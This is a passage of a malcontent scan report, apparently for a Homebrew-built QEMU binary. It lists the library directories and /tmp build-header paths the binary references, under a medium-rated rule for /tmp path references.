[/home/linuxbrew/.linuxbrew/opt/llvm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fllvm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lm-sensors/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flm-sensors%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lz4/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flz4%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lzo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flzo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa-glu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa-glu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mpdecimal/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmpdecimal%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/nettle/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fnettle%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/openssl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fopenssl&type=code)
[/home/linuxbrew/.linuxbrew/opt/p11-kit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fp11-kit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pango/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpango%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pcre2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpcre2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pixman/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpixman%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/python](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpython&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/snappy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsnappy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-llvm-translator/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-llvm-translator%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-tools/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-tools%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/systemd/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsystemd%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/unbound/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Funbound%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/util-linux/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Futil-linux%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/valgrind/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvalgrind%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/vde/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvde%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/wayland/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fwayland%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-image/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-image%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-keysyms/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-keysyms%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-renderutil/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-renderutil%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-wm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-wm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xkbcomp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxkbcomp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xorg-server/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxorg-server%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/z3/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fz3%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/sbin/samba-dot-org-smbd](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fsbin%2Fsamba-dot-org-smbd&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/perf-%d.map](https://github.com/search?q=%2Ftmp%2Fperf-%25d.map&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/block/block-gen.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fblock%2Fblock-gen.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/hw/usb/hcd-ehci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fhw%2Fusb%2Fhcd-ehci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/base.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fbase.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/list.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flist.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/listfile.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flistfile.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/simple.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fsimple.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/block/throttle-gro](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fblock%2Fthrottle-gro&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-fd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-fd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-socke](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-socke&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_comm](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_comm&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_keyr](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_keyr&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tls-cipher-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftls-cipher-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscreds.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscreds.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsano](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsano&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredspsk](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredspsk&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsx50](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsx50&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory_ldst_c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory_ldst_c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/ram_addr.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fram_addr.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_aml_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_aml_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_dev_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_dev_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/vmgenid.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Fvmgenid.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/block/flash.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fblock%2Fflash.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/boards.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fboards.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/char/serial.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fchar%2Fserial.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/clock.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fclock.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/cpu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fcpu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/generic-lo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fgeneric-lo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/resetconta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fresetconta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/cluster.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcluster.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcore.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/display/i2c-ddc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fdisplay%2Fi2c-ddc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/elf_ops.h.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Felf_ops.h.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/fw-path-provide](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Ffw-path-provide&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/hotplug.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fhotplug.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/i2c/i2c.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fi2c%2Fi2c.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-pci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-sysbus](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-sysbus&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-bus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-bus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-dev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-dev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/intc/intc.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fintc%2Fintc.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ipack/ipack.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fipack%2Fipack.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/misc/vmcoreinfo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fmisc%2Fvmcoreinfo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nmi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnmi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nvram/fw_cfg.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnvram%2Ffw_cfg.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci-host/gpex.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci-host%2Fgpex.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_bridge.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_bridge.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_device.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_device.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_port.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_port.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/qdev-core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fqdev-core.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/resettable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fresettable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/esp.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fesp.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/scsi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fscsi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sdhci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsdhci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sysbus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsysbus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/imx-usb-phy](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fimx-usb-phy&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/msd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fmsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-commo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-commo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-conta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-conta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vdpa-dev](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvdpa-dev&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-sc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-sc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-us](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-us&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-vs](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-vs&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-b](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-b&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-g](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-g&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-n](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-n&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-p](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-p&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-r](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-r&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-s](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-s&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vmstate-if.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvmstate-if.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-buffer.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-buffer.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-command](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-command&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-file.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-file.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-null.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-null.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-socket.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-socket.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-tls.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-tls.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-websock](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-websock&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/dns-resolver.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fdns-resolver.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/net-listener.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fnet-listener.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/can_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Fcan_host.h&type=code)
